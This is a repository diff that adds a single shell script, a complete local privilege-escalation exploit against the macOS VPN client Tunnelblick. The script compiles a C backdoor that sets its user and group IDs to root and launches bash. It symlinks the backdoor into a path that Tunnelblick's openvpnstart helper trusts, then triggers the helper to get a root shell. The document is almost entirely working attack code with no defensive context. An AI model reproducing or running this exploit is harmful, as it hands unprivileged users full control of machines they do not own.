diff options
Diffstat (limited to 'pwnnel-blicker-for-kids.sh')
-rwxr-xr-x | pwnnel-blicker-for-kids.sh | 28 |
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh new file mode 100755 index 0000000..bc1a336 --- /dev/null +++ b/pwnnel-blicker-for-kids.sh @@ -0,0 +1,28 @@ +#!/bin/sh +echo "[+] Making vulnerable directory." +mkdir -pv /tmp/pwn/openvpn/openvpn-0 + +echo "[+] Preparing payload." +cat > /tmp/pwn/backdoor.c <<_EOF +#include <unistd.h> +#include <sys/stat.h> +#include <stdio.h> + +int main() +{ + printf("[+] Cleaning up.\n"); + system("rm -rfv /tmp/pwn"); + printf("[+] Getting root.\n"); + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); +} +_EOF +gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c + +echo "[+] Creating symlinks." +ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn +ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start + +echo "[+] Triggering vulnerable program." +exec /tmp/pwn/start OpenVPNInfo 0 |